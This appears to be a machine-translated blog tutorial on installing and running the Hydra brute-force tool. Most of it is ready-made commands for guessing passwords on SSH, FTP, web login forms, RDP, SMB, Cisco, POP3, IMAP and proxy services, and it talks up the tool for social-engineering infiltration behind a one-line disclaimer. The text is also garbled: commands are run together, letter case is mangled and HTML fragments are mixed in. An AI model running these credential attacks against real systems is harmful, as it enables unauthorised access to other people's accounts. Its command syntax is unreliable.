Linux Brute force password cracking tool Hydra installation and use

Description
Hydra is a well-known hacker organization THC Open-source brute force password cracking tool, can hack a variety of passwords online. Official website: Http://www.thc.org/thc-hydra, can support AFP, Cisco AAA, Cisco Auth, Cisco Enable, CVS, Firebird, FTP, Http-form-get, Http-form -post, Http-get, Http-head, Http-proxy, Https-form-get, Https-form-post, Https-get, Https-head, HTTP-PROXY, ICQ, IMAP, IR C, LDAP, Ms-sql, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, Pc-anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rl Ogin, Rsh, Sap/r3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, TeamSpeak (TS2), Telnet, vmware-a Uth, VNC and XMPP type passwords.
This brute force password cracking tool is quite powerful, supporting the online password cracking of almost all protocols, the key to whether the password can be cracked is whether the dictionary is strong enough. For social engineering infiltration, sometimes you can get a multiplier effect. This article explores the test only from a security perspective and should not be used for illegal events.

Installation:
1.yum install the appropriate dependency package

# yum Install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

2.hydra Compile and install

# cd/usr/local/src# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz# tar ZXF hydra-6.3-src.tar.gz# CD HYDRA-6.3-SRC#./configure# make# make install     

#./configure will detect some components of the current system configuration, mainly for the crack support module detection, you can install the corresponding support library and dependent packages as required


# make


# make Install


Parameters:

Hydra[[[-L LOGIN|-L FILE] [-P PASS|-P FILE]] | [-C FILE]] [-e NS][-o FILE] [-T TASKS] [-M FILE[-T TASKS]] [-W Time] [-F] [-S PORT] [-S] [-VV]Server service[Opt]-RContinue to crack from the last progress.-SUsingSslLink.-S PORTThis parameter allows you to specify a non-default port.-L LOGINSpecifies the cracked user to crack for a specific user.-L FILESpecifies a dictionary of user names.-P PASSlowercase, specify password cracking, less use, usually using a password dictionary.-P FILEUppercase, specifying the password dictionary.-e NSOptional options,N: null password Temptation,S: Use the specified user and password heuristics.-C FILEUse colon split format, such as "Login: Password" instead of-L/-PParameters.-M FILESpecifies one line for the target list file.-o FILESpecifies the result output file.-FIn use-Mparameter, the first login or password is found to abort the hack.-T TASKSThe number of concurrently running threads, which defaults to16。-W TimeSets the maximum time-out, in seconds, by default505。-V/ -VShow detailed procedures.ServerGoalIpserviceSpecify the service name, supported services, and protocols:Telnet FTP POP3[-Ntlm]Imap[-Ntlm] SMB smbnt http-{head| get} Http-{get| post}-form http-proxy Cisco Cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs snmp rsh CVS svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere TeamSpeak sip VMAUTHD Firebird NCP Afp et cetera. opt  optional             

Use:
1. Manually create the user name dictionary and password dictionary, just to demonstrate that only a few user names and weak passwords are added. When really cracked, you need to generate powerful dictionaries using the cipher dictionary generator


2. hack ssh:
# hydra-l users.txt-p password.txt-t 1-vv-e ns 192.168.1.8 SSH

Crack success, direct display results. You can also specify the result output file using the-o option.
# hydra-l users.txt-p password.txt-t 1-vv-e ns-o save.log 192.168.1.104 ssh


Other examples:

1. hack ssh:# hydra-l user name-p password Dictionary-t thread-vv-e ns IP ssh# hydra-l user name-p password Dictionary-t thread-o SAVE.LOG-VV IP s SH    

2. hack ftp:

# Hydra IP ftp-l user name-p password Dictionary-t thread (default)-VV# Hydra IP ftp-l user name-p password Dictionary-e ns-vv

3.get way to commit, hack Web login:

# hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-get/admin/# hydra-l user name-p password Dictionary-t thread-vv-e ns-f IP http-get/a dmin/index.php

4.post way to commit, hack Web login:

# hydra-l User name-p password Dictionary-s-IP http-post-form "/admin/login.php:username=^user^&password=^pass^&submit=login: Sorry password "# hydra-t 3-l admin-p pass.txt-o out.txt-f 10.36.16.18 http-post-form "Login.php:id=^user^&passwd=^pass^:wrong US Ername or password "(Parameter Description:-TNumber of simultaneous threads3,-l user name is adminpass.out.,-f  when cracked a password stop,   10.36. 16.18 target ip,http-post-form means cracking is using http post way submitted form password hack, <title The content in > is the return information hint that represents the error guess. )                  

5. hack https:

# hydra-m/index.php-l muts-p pass.txt 10.36.16.18 HTTPS

6. Crack TeamSpeak:

# hydra-l User name-p password Dictionary-s port number-VV IP teamspeak

7. hack Cisco:

# hydra-p Pass.txt 10.36.16.18 Cisco# hydra-m cloud-p pass.txt 10.36.16.18 cisco-enable

8. Crack SMB:

# hydra-l administrator-p pass.txt 10.36.16.18 SMB

9. Crack POP3:

# hydra-l muts-p pass.txt my.pop3.mail POP3

10. hack RDP:

# Hydra IP rdp-l administrator-p pass.txt-v

11. Crack Http-proxy:

# hydra-l Admin-p pass.txt http-proxy://10.36.16.18

12. hack IMAP:

# HYDRA-L USER.TXT-P Secret 10.36.16.18 IMAP PLAIN# hydra-c defaults.txt-6 imap://[fe80::2c:31ff:fe12:ac11]:14 3/plain This tool is far more powerful than the above test, its password can be cracked key lies in a powerful dictionary, for social work-type infiltration, sometimes can get more than a multiplier effect 

Appendix:
Appendix 1:hydra:error while loading shared libraries:libssh.so.4:cannot open Shared object file:no such file or directory
If it is Ubuntu system, directly apt-get install CMake Libssl-dev on it. But my system of CentOS, did not find Libssl-dev this thing. Because the hand # has compiled Libssh

# yum Install CMake# CD/USR/LOCAL/SRC# wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz# tar zxf libssh-0.4.8.tar.gz# CD libssh-0.4.8# mkdir Build# CD build# cmake-dcmake_install_prefix=/usr-dcmake_build_ Type=debug-dwith_ssh1=on. # make# make Install< Span class= "com" >#/sbin/ldconfig//To execute this sentence, otherwise it will appear hydra:error while loading shared libraries:libssh.so.4:cannot open share D object File:no such file or Directory# cd/usr/local/src# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz# Tar zxf hydra-6.3-src.tar.gz# CD hydra-6.3-src #./configure# make# Make install               

Appendix 2:

Http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

Http://www.ha97.com/5186.html

Linux Brute force password cracking tool Hydra installation and use